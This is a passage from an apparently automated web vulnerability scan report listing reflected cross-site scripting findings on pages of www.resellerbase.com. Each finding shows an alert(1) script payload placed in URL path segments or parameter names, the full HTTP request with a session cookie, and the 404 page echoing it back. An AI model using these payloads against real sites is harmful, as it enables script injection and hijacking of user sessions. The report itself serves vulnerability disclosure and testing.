<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesfa4c2<script>alert(1)</script>599bd658ae6/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.332. http://www.resellerbase.com/adult/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b38c8<script>alert(1)</script>621eb4ce21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosb38c8<script>alert(1)</script>621eb4ce21/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmosb38c8<script>alert(1)</script>621eb4ce21/images/ was not found on this server.</p>
...[SNIP]...

2.333. http://www.resellerbase.com/adult/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 28791<script>alert(1)</script>65878c2e52b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images28791<script>alert(1)</script>65878c2e52b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images28791<script>alert(1)</script>65878c2e52b/ was not found on this server.</p>
...[SNIP]...

2.334. http://www.resellerbase.com/adult/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload faa45<script>alert(1)</script>1d823561eab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/?faa45<script>alert(1)</script>1d823561eab=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/?faa45<script>alert(1)</script>1d823561eab=1 was not found on this server.</p>
...[SNIP]...

2.335. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f76b1<script>alert(1)</script>b3b1e232e50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultf76b1<script>alert(1)</script>b3b1e232e50/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultf76b1<script>alert(1)</script>b3b1e232e50/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.336. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73b33<script>alert(1)</script>eea7011fbd8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes73b33<script>alert(1)</script>eea7011fbd8/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes73b33<script>alert(1)</script>eea7011fbd8/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.337. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload af3c7<script>alert(1)</script>b0df3a7ae6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosaf3c7<script>alert(1)</script>b0df3a7ae6a/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmosaf3c7<script>alert(1)</script>b0df3a7ae6a/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.338. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f87c<script>alert(1)</script>0181e746451 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images7f87c<script>alert(1)</script>0181e746451/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images7f87c<script>alert(1)</script>0181e746451/folder.gif was not found on this server.</p>
...[SNIP]...

2.339. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 80aeb<script>alert(1)</script>6f3e10c19c3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/folder.gif80aeb<script>alert(1)</script>6f3e10c19c3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/folder.gif80aeb<script>alert(1)</script>6f3e10c19c3 was not found on this server.</p>
...[SNIP]...

2.340. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d639<script>alert(1)</script>d8ae41438e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/folder.gif?2d639<script>alert(1)</script>d8ae41438e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/folder.gif?2d639<script>alert(1)</script>d8ae41438e=1 was not found on this server.</p>
...[SNIP]...

2.341. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70185<script>alert(1)</script>d0cf90331d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult70185<script>alert(1)</script>d0cf90331d9/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult70185<script>alert(1)</script>d0cf90331d9/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.342. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 16049<script>alert(1)</script>c7996499558 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes16049<script>alert(1)</script>c7996499558/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes16049<script>alert(1)</script>c7996499558/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.343. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9231a<script>alert(1)</script>821d3a7aed5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos9231a<script>alert(1)</script>821d3a7aed5/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos9231a<script>alert(1)</script>821d3a7aed5/images/rating/ was not found on this server.</p>
...[SNIP]...

2.344. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb92c<script>alert(1)</script>d5912c97b26 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/imagescb92c<script>alert(1)</script>d5912c97b26/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/imagescb92c<script>alert(1)</script>d5912c97b26/rating/ was not found on this server.</p>
...[SNIP]...

2.345. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a0b1b<script>alert(1)</script>52eb495b56d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/ratinga0b1b<script>alert(1)</script>52eb495b56d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/ratinga0b1b<script>alert(1)</script>52eb495b56d/ was not found on this server.</p>
...[SNIP]...

2.346. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 46313<script>alert(1)</script>bfd0a12799a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/?46313<script>alert(1)</script>bfd0a12799a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/?46313<script>alert(1)</script>bfd0a12799a=1 was not found on this server.</p>
...[SNIP]...

2.347. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9238c<script>alert(1)</script>e36e8f0c451 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult9238c<script>alert(1)</script>e36e8f0c451/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult9238c<script>alert(1)</script>e36e8f0c451/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.348. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a56ec<script>alert(1)</script>7fff6e52b96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesa56ec<script>alert(1)</script>7fff6e52b96/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesa56ec<script>alert(1)</script>7fff6e52b96/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.349. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 918b7<script>alert(1)</script>37a655a4536 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos918b7<script>alert(1)</script>37a655a4536/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos918b7<script>alert(1)</script>37a655a4536/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.350. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe85f<script>alert(1)</script>ae2db4ac63e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/imagesfe85f<script>alert(1)</script>ae2db4ac63e/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/imagesfe85f<script>alert(1)</script>ae2db4ac63e/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.351. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 20f3c<script>alert(1)</script>909308d1ea2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating20f3c<script>alert(1)</script>909308d1ea2/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
